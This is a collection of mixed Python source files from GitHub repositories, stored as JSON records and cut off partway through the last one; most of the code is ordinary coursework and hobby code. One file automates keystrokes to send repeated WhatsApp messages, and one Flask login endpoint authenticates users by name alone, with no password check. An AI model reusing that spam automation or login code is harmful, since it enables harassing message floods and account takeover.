filename = f'{park_name}_{index}.jpg'\n with open(filename, 'wb') as file:\n for chunk in chosen_img.iter_content():\n file.write(chunk)\n\n\nmain()\n","repo_name":"rwalk651/ProgrammingLogicAndDesign","sub_path":"MN_Park_Guide_With_Street_Map_V2_Email_Edits.py","file_name":"MN_Park_Guide_With_Street_Map_V2_Email_Edits.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5783132854","text":"import keyboard\nfrom loguru import logger\nfrom djitellopy import Tello\nfrom tello_fly import TelloFly\nfrom tello_controller import TelloController\n\n\ndef main():\n logger.info(\"Initializing pygame...\")\n\n keyboard.init()\n\n logger.info(\"Pygame initialized\")\n logger.info(\"Connecting tello...\")\n\n tello = Tello()\n tello.connect()\n\n logger.info(\"Tello connected\")\n logger.info(f\"Remaining battery: {tello.get_battery()}\")\n\n controller = TelloController()\n fly = TelloFly(tello, controller)\n\n fly.fly(battery=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gotsulyakk/tello-programming","sub_path":"2_object_detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32146157684","text":"import pants\nimport math\nimport random\nimport csv\nimport sys\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom geopy.distance import vincenty\n\nnodes = []\n\n#Create the map\ndef createWorld():\n\treturn pants.World(nodes, calculateDistance)\n\t\n#Init the solver\ndef createSolver():\n\treturn pants.Solver()\n\n#Print the results\t\ndef printSolution(solver,world):\n\tsolutions = solver.solutions(world)\n\t\n\tbestSolutionLength = sys.maxsize\n\tfor solution in solutions:\n\t\tif solution.distance < bestSolutionLength:\n\t\t\tbestSolution = solution\n\t\t\tbestSolutionLength = solution.distance\n\t\tprint('Ants colony found a way ! Need %d meters to make it all' % solution.distance)\n\tprint('')\n\tprint('===============================')\n\tprint('Best solution is %d meters' % bestSolution.distance)\n\tprint('===============================')\n\treturn bestSolution;\n\t\n#Calculcate distance using vincenty(geopy) lib for lat/long distance\ndef calculateDistance(a,b):\n\treturn round(vincenty(a,b).meters)\n\t\n#Open Csv file\ndef readCsv():\n\tfile = open('test.csv','r')\n\treturn csv.reader(file ,delimiter=',',quotechar='\"')\n\t\n#Main function\ndef main():\t\n\t#init data\n\tnodesTemp = []\n\treader = readCsv()\n\tnbInvalid = 0\n\tnbDuplicate = 0\n\t\n\t#read csv\n\tfor row in reader:\t\n\t\ttabRow= row\n\t\ttry :\n\t\t\tif float(row[len(row) -2])<90 and float(row[len(row) -2])>-90 and float(row[len(row)-3])<180 and float(row[len(row)-3])>-180 :\n\t\t\t\tnodesTemp.append((float(row[len(row) - 2]),float(row[len(row) -3])))\n\t\t\telse :\n\t\t\t\tprint('errors')\n\t\t\t\tnbInvalid += 1\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tprint('error')\n\t\t\tnbInvalid += 1\n\t\t\n\t#\n\tfor elem in nodesTemp:\n\t\tif elem not in nodes:\n\t\t\tnodes.append(elem)\n\t\telse :\n\t\t\tnbDuplicate += 1\n\t#for debug\n\t#print(nodes)\n\t\n\t#print the csv parsing result\n\tprint('===============================')\n\tprint('%d valid nodes found in csv' % len(nodes))\t\n\tprint('%d invalid nodes found in csv' % nbInvalid)\t\n\tprint('%d duplicate geoloc found in csv' % nbDuplicate)\t\n\tprint('===============================')\n\tprint('')\n\t\n\tworld = createWorld()\n\tsolver = createSolver()\n\tbestSolution = printSolution(solver,world)\n\tcreateGraph(bestSolution)\n\tinput('exit?')\n\t\ndef createGraph(solution):\n noeudsVisiter = solution.tour\n G = nx.Graph()\n # G.add_edges_from(noeudsVisiter)\n for noeud in noeudsVisiter:\n G.add_edge(format(noeud[0]), format(noeud[1]), weight=0.6)\n plt.subplot(121)\n\n node_positions = nx.spring_layout(G) # positions for all nodes\n nx.draw_networkx(G, pos=node_positions, node_size=100, node_color='red', edge_color=\"green\", with_labels=True,\n alpha=1)\n\n edge_labels = nx.get_edge_attributes(G, 'sequence')\n nx.draw_networkx_edge_labels(G, pos=node_positions, edge_labels=edge_labels, font_size=20)\n nx.draw_networkx_nodes(G, pos=node_positions, node_size=20)\n nx.draw_networkx_edges(G, pos=node_positions, alpha=0.4)\n\n plt.xticks([])\n plt.yticks([])\n\n plt.text(0.5, 0.5, G, ha=\"center\", va=\"center\", size=24, alpha=.5)\n plt.title('Noeuds Vistées', size=15)\n\n plt.ylabel(\"Y\")\n plt.xlabel(\"X\")\n plt.axis('off')\n\n plt.subplot(122)\n degree_sequence = sorted([d for n, d in G.degree()], reverse=True)\n dmax = max(degree_sequence)\n\n # draw graph in inset\n plt.axis('off')\n plt.show()\n\n\t\nmain()\n","repo_name":"HugoB0ss/TP-Ants-fourmiale","sub_path":"tp.py","file_name":"tp.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3444255755","text":"from django.urls import path\nfrom .views import *\nfrom django.views.generic.base import TemplateView\n\nurlpatterns = [\n path('', HomeView.as_view(), name='home'),\n path('register/',Register.as_view(), name='register'),\n path('login/',LoggingIn.as_view() , name='login'),\n path('logout/',log_out , name='logout'),\n path('category//',CategoryDetail.as_view() , name='category'),\n path('category_list/',CategoryList.as_view() , name='categories'),\n path('book_table/',BookTable.as_view() , name='book_table'),\n path('subsribe/',Subscription.as_view() , name='subscribe'),\n \n]","repo_name":"Nickolasso2/Sportbar","sub_path":"app_sportbar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25692766983","text":"import os\nfrom flask import Flask, request, jsonify, abort\nfrom sqlalchemy import exc\nimport json\nfrom flask_cors import CORS\n\nfrom .database.models import db_drop_and_create_all, setup_db, Drink\nfrom .auth.auth import AuthError, requires_auth\n\napp = Flask(__name__)\nsetup_db(app)\nCORS(app)\n\n'''\n@DONE uncomment the following line to initialize the datbase\n!! NOTE THIS WILL DROP ALL RECORDS AND START YOUR DB FROM SCRATCH\n!! NOTE THIS MUST BE UNCOMMENTED ON FIRST RUN\n'''\ndb_drop_and_create_all()\n\n# ROUTES\n'''\n@DONE implement endpoint\n GET /drinks\n it should be a public endpoint\n it should contain only the drink.short() data representation\n returns status code 200 and json {\"success\": True, \"drinks\": drinks}\n where drinks is the list of drinks\n or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks')\ndef get_drinks():\n \"\"\"\n :returns all drinks in json format.\n No authentication nor authorization needed\n \"\"\"\n drinks = Drink.query.all()\n\n return jsonify({\n \"success\": True,\n \"drinks\": [drink.short() for drink in drinks]\n }), 200\n\n\n'''\n@DONE implement endpoint\n GET /drinks-detail\n it should require the 'get:drinks-detail' permission\n it should contain the drink.long() data representation\n returns status code 200 and json {\"success\": True, \"drinks\": drinks}\n where drinks is the list of drinks\n or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks-detail')\n@requires_auth('get:drinks-detail')\ndef get_drinks_detail(payload):\n \"\"\"\n :returns: all drinks in json with detailed recipe\n only barista & managers can access it.\n \"\"\"\n drinks = Drink.query.all()\n\n return jsonify({\n \"success\": True,\n \"drinks\": [drink.long() for drink in drinks]\n }), 200\n\n\n'''\n@DONE implement endpoint\n POST /drinks\n it should create a new row in the drinks table\n it should require the 'post:drinks' permission\n it should contain the drink.long() data representation\n returns status code 200 and json {\"success\": True, \"drinks\": drink}\n where drink an array containing only the newly created drink\n or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks', methods=['POST'])\n@requires_auth('post:drinks')\ndef post_drink(payload):\n \"\"\"\n Creates a new drink.\n Only accessible for managers\n \"\"\"\n body = request.get_json()\n title = body.get('title', None)\n recipe = body.get('recipe', None)\n\n try:\n # Check if title and recipe included in the body\n if title is None or recipe is None:\n abort(422)\n\n # Create a new drink object\n new_drink = Drink(title=title, recipe=json.dumps(recipe))\n new_drink.insert()\n\n return jsonify({\n \"success\": True,\n \"drinks\": [new_drink.long()],\n \"message\": \"Created Successfully\"\n }), 200\n\n except:\n # In case of having errors\n abort(422)\n\n\n'''\n@DONE implement endpoint\n PATCH /drinks/\n where is the existing model id\n it should respond with a 404 error if is not found\n it should update the corresponding row for \n it should require the 'patch:drinks' permission\n it should contain the drink.long() data representation\n returns status code 200 and json {\"success\": True, \"drinks\": drink}\n where drink an array containing only the updated drink\n or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks/', methods=['PATCH'])\n@requires_auth('patch:drinks')\ndef update_drink(payload, id):\n \"\"\"\n Updates existing drink by id\n Only accessible for managers\n \"\"\"\n\n drink_to_update = Drink.query.filter_by(id=id).one_or_none()\n # Check if the drink with this id exists\n if drink_to_update is None:\n abort(404)\n body = request.get_json()\n title = body.get('title', None)\n recipe = body.get('recipe', None)\n\n # Check if the body contains at least one of the needed fields\n if title is None and recipe is None:\n abort(422)\n\n try:\n # update the title if included in the request\n if title is not None:\n drink_to_update.title = title\n\n # update the recipe if included in the request\n if recipe is not None:\n drink_to_update.recipe = json.dumps(recipe)\n drink_to_update.update()\n\n return jsonify({\n \"success\": True,\n \"drinks\": [drink_to_update.long()]\n }), 200\n except:\n # In case of failure\n abort(422)\n\n\n'''\n@DONE implement endpoint\n DELETE /drinks/\n where is the existing model id\n it should respond with a 404 error if is not found\n it should delete the corresponding row for \n it should require the 'delete:drinks' permission\n returns status code 200 and json {\"success\": True, \"delete\": id}\n where id is the id of the deleted record\n or appropriate status code indicating reason for failure\n'''\n\n\n@app.route('/drinks/', methods=['DELETE'])\n@requires_auth('delete:drinks')\ndef delete_drink(payload, id):\n \"\"\"\n Deletes an existing drink by id\n Only accessible for managers\n \"\"\"\n drink_to_delete = Drink.query.filter_by(id=id).one_or_none()\n\n # Check if a drink with this id exists.\n if drink_to_delete is None:\n abort(404)\n try:\n drink_to_delete.delete()\n\n return jsonify({\n \"success\": True,\n \"delete\": id\n }), 200\n except:\n # In case of failure\n abort(422)\n\n\n# Error Handling\n'''\nExample error handling for unprocessable entity\n'''\n\n'''\n@DONE implement error handlers using the @app.errorhandler(error) decorator\n each error handler should return (with approprate messages):\n jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"resource not found\"\n }), 404\n\n'''\n\n'''\n@DONE implement error handler for 404\n error handler should conform to general task above\n'''\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"Resource Not Found\"\n }), 404\n\n\n# I created this for bad json requests\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"Bad Request\"\n }), 400\n\n\n@app.errorhandler(422)\ndef unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n\n@app.errorhandler(401)\ndef unauthorized(error):\n return jsonify({\n \"success\": False,\n \"error\": 401,\n \"message\": \"Unauthorized\"\n }), 401\n\n\n@app.errorhandler(403)\ndef unauthorized(error):\n return jsonify({\n \"success\": False,\n \"error\": 403,\n \"message\": \"Forbidden\"\n }), 403\n\n\n'''\n@DONE implement error handler for AuthError\n error handler should conform to general task above\n'''\n\n\n@app.errorhandler(AuthError)\ndef unauthorized(error):\n return jsonify({\n \"success\": False,\n \"error\": error.status_code,\n \"message\": error.error\n }), error.status_code\n","repo_name":"walidzakaria/coffee_shop_full_stack","sub_path":"backend/src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32739318885","text":"def solution(numbers):\n stack = []\n answer = [-1] * len(numbers)\n for idx, num in enumerate(numbers):\n while stack != []:\n i, n = stack[-1]\n if n < num:\n stack.pop()\n answer[i] = num\n else:\n break\n stack.append([idx, num])\n return answer\n\n","repo_name":"SIDED00R/Code_training","sub_path":"프로그래머스/2/154539. 뒤에 있는 큰 수 찾기/뒤에 있는 큰 수 찾기.py","file_name":"뒤에 있는 큰 수 찾기.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75063680808","text":"import spacy\n\nfrom api.models import InvertedIndex\n\n\nclass InvertedIndexSearch:\n def __init__(self):\n self.nlp = spacy.load(\"ru_core_news_sm\")\n\n def search_pages(self, query):\n pages_union = []\n\n words = []\n\n try:\n words = [self.nlp(word.lower()).text for word in query.split(\" \")]\n except Exception as e:\n pass\n\n inverted_indexes = InvertedIndex.objects.filter(token__in=words)\n\n pages = [page_array.pages for page_array in inverted_indexes]\n\n for page in pages:\n\n if len(pages_union) == 0:\n pages_union = page\n else:\n pages_union = list(set(pages_union) | set(page))\n\n return pages_union\n\n\nclass InvertedIndexService:\n def __init__(self, path):\n self.path_inverted_index = path\n\n def generate(self):\n with open(self.path_inverted_index, 'r', encoding='utf-8') as file:\n for line in file:\n line_split = line.strip(\"\\n\").strip('').split(\" \")\n\n pages = [int(i) for i in line_split[1:] if i != '']\n\n obj, created = InvertedIndex.objects.update_or_create(token=line_split[0], pages=pages)\n","repo_name":"AMiracle-creator/InfoSearch","sub_path":"demo/src/api/service/genertate_inverted_index.py","file_name":"genertate_inverted_index.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74166891687","text":"import json\nfrom pathlib import Path\nimport copy\n\ntranslate_names = {\n \"Moves\": \"m\",\n \"Level\": \"l\",\n \"Starting Move\": \"sm\",\n \"TM\": \"tm\",\n \"index\": \"i\",\n \"Abilities\": \"a\",\n \"Type\": \"t\",\n \"SR\": \"sr\",\n \"AC\": \"ac\",\n \"HP\": \"hp\",\n \"Hit Dice\": \"hd\",\n \"attributes\": \"atr\",\n \"MIN LVL FD\": \"lvl\",\n \"SKill\": \"s\",\n \"Senses\": \"sn\",\n \"Hidden Ability\": \"ha\",\n \"Evolve\": \"e\",\n \"saving_throws\": \"st\"\n }\n\n\ndef convert_names(json_data):\n json_copy = copy.deepcopy(json_data)\n for key, value in json_data.items():\n if key in translate_names:\n json_copy[translate_names[key]] = json_copy.pop(key)\n return json_copy\n\n\ndef convert_speeds(json_data):\n json_copy = copy.deepcopy(json_data)\n translate = {\"WSp\": \"w\",\n \"SSp\": \"s\",\n \"FSp\": \"f\",\n \"Climbing Speed\": \"c\",\n \"Burrowing Speed\": \"b\",\n }\n\n json_copy[\"sp\"] = {}\n for speed_from, speed_to in translate.items():\n if speed_from in json_copy:\n json_copy[\"sp\"][speed_to] = json_copy.pop(speed_from)\n return json_copy\n\n\ndef convert(path):\n with path.open(encoding=\"utf-8\") as fp:\n data = json.load(fp)\n j_copy = convert_speeds(data)\n j_copy = convert_names(j_copy)\n\n with path.open(\"w\", encoding=\"utf-8\") as fp:\n json.dump(j_copy, fp, ensure_ascii=False, indent=2)\n\n\nconvert(Path(r\"E:\\projects\\repositories\\Pokedex5E\\assets\\datafiles\\pokemon\\Abomasnow.json\"))\n","repo_name":"Jerakin/Pokedex5E","sub_path":"tools/scripts/one_offs/convert_pokemon_files.py","file_name":"convert_pokemon_files.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"53"} +{"seq_id":"39013760027","text":"import os\nimport re\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n\ndef readHalftimes(N_file, Q_file):\n # Read in halftimes\n with open(N_file, 'r') as f:\n N_halftimes = json.load(f)\n\n with open(Q_file, 'r') as f:\n Q_halftimes = json.load(f)\n\n\n return(N_halftimes, Q_halftimes)\n\n\ndef plot_halftimes_hist(N_halftimes, Q_halftimes):\n nh = [r[0] for r in list(N_halftimes.values())]\n nh = np.array(nh)\n qh = [r[0] for r in list(Q_halftimes.values())]\n qh = np.array(qh)\n\n fig = plt.figure()\n axN = fig.add_subplot(211)\n axN.hist(np.log(nh), bins=30, density=True)\n axN.set_xlabel('N deamidation halftime')\n axQ = fig.add_subplot(212)\n axQ.hist(np.log(qh), bins=20, density=True)\n axQ.set_xlabel('Q deamidation halftime')\n\n plt.savefig('./deamidation_halftimes.png')\n plt.close()\n\ndef sort_tripeps(tripeps, halftimes):\n \"\"\"\n Sort an array of tripeptides according to\n \"\"\"\n tripeps = np.array(tripeps)\n hts = [halftimes[trp][0] for trp in tripeps]\n hts = np.array(hts)\n ind = np.argsort(hts)\n tripeps = tripeps[ind]\n hts = hts[ind]\n return tripeps, hts\n\n\ndef group_by_bins(halftimes, Nbins, Qbins):\n for tripep, data in halftimes.items():\n halftime = data[0]\n log_halftime = np.log(halftime)\n if tripep[1] == 'N':\n for i in range(len(Nbins)-1):\n if Nbins[i] <= log_halftime < Nbins[i+1]:\n halftimes[tripep] = [halftime, i]\n if tripep[1] == 'Q':\n for i in range(len(Qbins)-1):\n if Qbins[i] <= log_halftime < Qbins[i+1]:\n halftimes[tripep] = [halftime, i+len(Nbins)-1]\n\ndef group_by_seq(halftimes, pos='right'):\n for tripep, data in halftimes.items():\n if pos== 'right':\n group = '_' + tripep[1] + tripep[2]\n elif pos=='left':\n group = tripep[0] + tripep[1] + '_'\n elif pos=='middle':\n group = '_' + tripep[1] + '_'\n halftimes[tripep][1] = group\n\ndef group_by_range(halftimes, range=0.1):\n halftimes_tmp = halftimes.copy()\n # Mark tripeptides as unused for grouping\n for k in halftimes_tmp.keys():\n halftimes_tmp[k].append(0)\n group = 0\n for k in halftimes_tmp.keys():\n if halftimes_tmp[k][2]==1:\n continue # Continue if already grouped\n ht = halftimes_tmp[k][0]\n halftimes_tmp[k][1] = str(group)\n lower_limit = ht - (ht * range)\n upper_limit = ht + (ht * range)\n halftimes_tmp[k][2] = 1\n for l in halftimes_tmp.keys():\n if lower_limit<=halftimes_tmp[l][0]')\ndef index(id=0):\n return render_template(\"index.html\")\n\napi = Api(app)\nclass Productions(Resource):\n def get(self):\n production_list = [p.to_dict() for p in Production.query.all()]\n response = make_response(\n production_list,\n 200,\n )\n\n return response\n\n def post(self):\n form_json = request.get_json()\n new_production = Production(\n title=form_json['title'],\n genre=form_json['genre'],\n budget=int(form_json['budget']),\n image=form_json['image'],\n director=form_json['director'],\n description=form_json['description']\n )\n\n db.session.add(new_production)\n db.session.commit()\n\n response_dict = new_production.to_dict()\n\n response = make_response(\n response_dict,\n 201,\n )\n return response\napi.add_resource(Productions, '/productions')\n\n\nclass ProductionByID(Resource):\n def get(self,id):\n production = Production.query.filter_by(id=id).first()\n if not production:\n raise NotFound\n production_dict = production.to_dict()\n response = make_response(\n production_dict,\n 200\n )\n \n return response\n\n def patch(self, id):\n production = Production.query.filter_by(id=id).first()\n if not production:\n raise NotFound\n\n for attr in request.form:\n setattr(production, attr, request.form[attr])\n\n production.ongoing = bool(request.form['ongoing'])\n production.budget = int(request.form['budget'])\n\n db.session.add(production)\n db.session.commit()\n\n production_dict = production.to_dict()\n \n response = make_response(\n production_dict,\n 200\n )\n return response\n\n def delete(self, id):\n production = Production.query.filter_by(id=id).first()\n if not production:\n raise NotFound\n db.session.delete(production)\n db.session.commit()\n\n response = make_response('', 204)\n \n return response\napi.add_resource(ProductionByID, '/productions/')\n\nclass Signup(Resource):\n def post(self):\n \n name = request.get_json()['name']\n email = request.get_json()['name']\n password = request.get_json()['password']\n\n new_user = User(name=name, email=email, admin=False)\n new_user.password_hash = password\n db.session.add(new_user)\n db.session.commit()\n\n session['user_id'] = new_user.id\n \n return new_user.to_dict(), 201\n\napi.add_resource(Signup, '/signup', endpoint='signup')\n\n\nclass Login(Resource):\n\n def post(self):\n user = User.query.filter(User.name == request.get_json()['name']).first()\n session['user_id'] = user.id\n user_dict = user.to_dict()\n response = make_response(\n user_dict,\n 200,\n )\n return response\n\napi.add_resource(Login, '/login', endpoint='login')\n\nclass AuthorizedSession(Resource):\n def get(self):\n\n if session.get('user_id'):\n \n user = User.query.filter(User.id == session['user_id']).first()\n \n return user.to_dict(), 200\n \n else:\n raise Unauthorized\n\n\napi.add_resource(AuthorizedSession, '/authorized', endpoint='authorized')\n\n\nclass Logout(Resource):\n def delete(self):\n session['user_id'] = None\n response = make_response('',204,)\n return response\n\napi.add_resource(Logout, '/logout', endpoint='logout')\n\n\n@app.errorhandler(NotFound)\ndef handle_not_found(e):\n response = make_response(\n \"Not Found: Sorry the resource you are looking for does not exist\",\n 404\n )\n\n return response\n\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)","repo_name":"ixnp/python_test","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42319199634","text":"#-*-coding:utf8-*-\n\nfrom pynput.keyboard import Key, Controller\nimport string\nfrom time import sleep\n\nclass Spam():\n\tdef __init__(self):\n\t\tself.keyboard = Controller()\n\t\n\tdef cambiar_de_ventana(self):\n\t\twith self.keyboard.pressed(Key.cmd):\n\t\t\tself.keyboard.press(Key.tab)\n\t\t\tself.keyboard.release(Key.tab)\n\t\t\n\t\tsleep(0.5)\n\n\tdef enviar_mensajes(self, texto, cantidad_de_veces):\n\t\tfor n in range(cantidad_de_veces):\n\t\t\tfor j in range(len(texto)):\n\t\t\t\tcaracter = texto[j]\n\t\t\t\tif caracter == ' ':\n\t\t\t\t\tself.keyboard.press(Key.space)\n\t\t\t\t\tself.keyboard.release(Key.space)\n\t\t\t\telif caracter in string.ascii_uppercase:\n\t\t\t\t\twith self.keyboard.pressed(Key.shift):\n\t\t\t\t\t\tcaracter = caracter.lower()\n\t\t\t\t\t\tself.keyboard.press(caracter)\n\t\t\t\t\t\tself.keyboard.release(caracter)\n\t\t\t\telse:\n\t\t\t\t\tself.keyboard.press(caracter)\n\t\t\t\t\tself.keyboard.release(caracter)\n\n\t\t\tself.keyboard.press(Key.enter)\n\t\t\tself.keyboard.release(Key.enter)\n\n# para descomentar borre las lineas 38 y 49 -------------\n'''\nwhatsapp = Spam()\n# para cambiar a la ventana anterior\nwhatsapp.cambiar_de_ventana()\n# para congelar el programa dos segundos\n#sleep(2)\n\ntexto = 'ingrese aca su texto'\nN = #cantidad de veces a enviar\n\nwhatsapp.cantidad_de_veces(texto, N)\n'''","repo_name":"luisalvaradoar/spam_whatsapp","sub_path":"class_spam.py","file_name":"class_spam.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37051676653","text":"#!/usr/bin/env python\n# @Time : 2019/3/30 11:37 \n__author__ = 'Boaz'\n\n# 0-100 找出所有的被5整除的数目\n\n\ndef getnum(min_,max_):\n for i in range(min_,max_+1):\n if i % 10 ==0:\n yield i\n\n\nf = getnum(0, 100)\nprint(f)\nfor n in f:\n print(n)","repo_name":"davidzhu1989/python-magic","sub_path":"Python-basic/生成器/mymethod2.py","file_name":"mymethod2.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36759071856","text":"# Write a python program to compute following computation on matrix:\r\n# a) Addition of two matrices\r\n# b) Subtraction of two matrices\r\n# c) Multiplication of two matrices\r\n# d) Transpose of a matrix\r\n\r\n\r\nclass MatrixOperations:\r\n def __init__(self, matrix, m, n):\r\n self.matrix = matrix # this is the matrix created according to the order of the matrix\r\n self.m = m # m is the number of rows\r\n self.n = n # n is the number of columns\r\n\r\n # for creating a matrix of dimensions m*n\r\n def create_matrix(self):\r\n self.matrix = []\r\n for i in range(self.m):\r\n self.matrix.append([])\r\n for i in self.matrix:\r\n for j in range(self.n):\r\n i.append(0)\r\n return self.matrix\r\n\r\n # create matrix for transpose\r\n def create_for_transpose(self):\r\n self.matrix = []\r\n for i in range(self.n):\r\n self.matrix.append([])\r\n for i in self.matrix:\r\n for j in range(self.m):\r\n i.append(0)\r\n return self.matrix\r\n\r\n # for creating matrix for multiplication\r\n # create matrix of order m*l\r\n def create_for_multiplication(self, m, l):\r\n self.matrix = []\r\n for i in range(m):\r\n self.matrix.append([])\r\n for i in self.matrix:\r\n for j in range(l):\r\n i.append(0)\r\n return self.matrix\r\n\r\n # for adding two matrices\r\n def addition(self, matrix_1, matrix_2):\r\n for i in range(0, self.m):\r\n for j in range(0, self.n):\r\n self.matrix[i][j] = matrix_1[i][j] + matrix_2[i][j]\r\n return self.matrix\r\n\r\n # for subtraction of two matrices\r\n def subtraction(self, matrix_1, matrix_2):\r\n for i in range(0, self.m):\r\n for j in range(0, self.n):\r\n self.matrix[i][j] = matrix_1[i][j] - matrix_2[i][j]\r\n return self.matrix\r\n\r\n # for transpose of a matrix\r\n def transpose(self, matrix_1):\r\n for i in range(0, self.m):\r\n for j in range(0, self.n):\r\n self.matrix[j][i] = matrix_1[i][j]\r\n return self.matrix\r\n\r\n def multiplication(self, matrix_1, matrix_2, m, n, l):\r\n for i in range(m):\r\n for j in range(l):\r\n add = 0\r\n for k in range(n):\r\n add = add + matrix_1[i][k]*matrix_2[k][j]\r\n self.matrix[i][j] = add\r\n return self.matrix\r\n\r\n\r\ndef display_matrix(matrix):\r\n for i in matrix:\r\n for j in i:\r\n print(j, end=\" \")\r\n print(\"\")\r\n\r\n\r\ndef get_matrix(m):\r\n matrix = []\r\n for i in range(m):\r\n arr = list(map(int, input().split()))\r\n matrix.append(arr)\r\n return matrix\r\n\r\n\r\nmatrix_demo = []\r\nn = 0\r\nwhile n != 5:\r\n print(\"Choose an option:\")\r\n print(\"1.Addition\")\r\n print(\"2.Subtraction\")\r\n print(\"3.Transpose\")\r\n print(\"4.Multiplication\")\r\n print(\"5.Exit\")\r\n n = int(input())\r\n\r\n # addition\r\n if n == 1:\r\n # m and n should be same for both the matrices\r\n m = int(input(\"Enter the number of rows:\"))\r\n n = int(input(\"Enter the number of columns:\"))\r\n print(\"--- Matrix 1 ---\")\r\n matrix_one = get_matrix(m)\r\n print(\"--- Matrix 2 ---\")\r\n matrix_two = get_matrix(m)\r\n\r\n obj_add = MatrixOperations(matrix_demo, m, n)\r\n obj_add.create_matrix() # for addition\r\n add_matrix = obj_add.addition(matrix_one, matrix_two)\r\n print(\"The addition of given matrices is: \")\r\n display_matrix(add_matrix)\r\n\r\n if n == 2:\r\n # m and n should be same for both the matrices\r\n m = int(input(\"Enter the number of rows:\"))\r\n n = int(input(\"Enter the number of columns:\"))\r\n print(\"--- Matrix 1 ---\")\r\n matrix_one = get_matrix(m)\r\n print(\"--- Matrix 2 ---\")\r\n matrix_two = get_matrix(m)\r\n\r\n obj_sub = MatrixOperations(matrix_demo, m, n)\r\n obj_sub.create_matrix() # for subtraction\r\n sub_matrix = obj_sub.subtraction(matrix_one, matrix_two)\r\n print(\"The subtraction of given matrices is: \")\r\n display_matrix(sub_matrix)\r\n\r\n if n == 3:\r\n m = int(input(\"Enter the number of rows:\"))\r\n n = int(input(\"Enter the number of columns:\"))\r\n print(\"--- Matrix ---\")\r\n matrix = get_matrix(m)\r\n print(matrix)\r\n obj_trans = MatrixOperations(matrix_demo, m, n)\r\n obj_trans.create_for_transpose()\r\n transpose_mat = obj_trans.transpose(matrix)\r\n print(\"Transpose of the matrix is:\")\r\n display_matrix(transpose_mat)\r\n\r\n if n == 4:\r\n # m*n and n*p\r\n m = int(input(\"Enter number of rows:\"))\r\n n = int(input(\"Enter number of columns:\"))\r\n print('--- Matrix 1 ---')\r\n matrix_one = get_matrix(m)\r\n\r\n p = int(input(\"Enter number of columns:\"))\r\n print('--- Matrix 2 ---')\r\n matrix_two = get_matrix(n)\r\n\r\n obj_mul = MatrixOperations(matrix_demo, m, p)\r\n obj_mul.create_for_multiplication(m, p)\r\n multiplication = obj_mul.multiplication(matrix_one, matrix_two, m, n, p)\r\n print('The multiplication of given matrices is:')\r\n display_matrix(multiplication)\r\n\r\n if n == 5:\r\n print(\"Bye Bye\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"aabhapingle/Fundamentals-of-Data-Structures","sub_path":"assignment_03.py","file_name":"assignment_03.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33383412421","text":"\"\"\"\nN과 L이 주어질 때, 합이 N이면서, 길이가 적어도 L이면서 가장 짧은 연속된 음이 아닌 정수 리스트를\n구하는 프로그램을 작성하시오.\n\n만약 리스트의 길이가 100보다 작거나 같으면, 연속된 수를 첫째 줄에 공백으로 구분하여 출력한다. 만약\n길이가 100보다 크거나 그러한 수열이 없을 때는 -1을 출력한다.\n\"\"\"\ndef gcd(a, b):\n return a if b == 0 else gcd(b, a % b)\n\n\ndef int_series(n, l):\n series = []\n if n % l == 0 and l % 2 == 1:\n series = [n // l] * l\n mid = len(series) // 2\n for i in range(1, mid+1):\n series[mid-i] -= i\n series[mid+i] += i\n elif l % 2 == 0 and l // gcd(n, l) == 2:\n series = [n / l] * l\n mid = len(series) // 2\n for i in range(mid):\n series[mid+i] += (i+0.5)\n series[mid-i-1] -= (0.5+i)\n series = [int(n) for n in series]\n return series if all(n >= 0 for n in series) else 0\n\n\nif __name__ == '__main__':\n n, l = (int(n) for n in input().split())\n exists = False\n\n\n while l <= 100:\n series = int_series(n, l)\n if series:\n exists = True\n break\n else:\n l += 1\n\n\n if exists:\n answer = ''\n for n in series:\n answer += str(n) + ' '\n print(answer.rstrip())\n else:\n 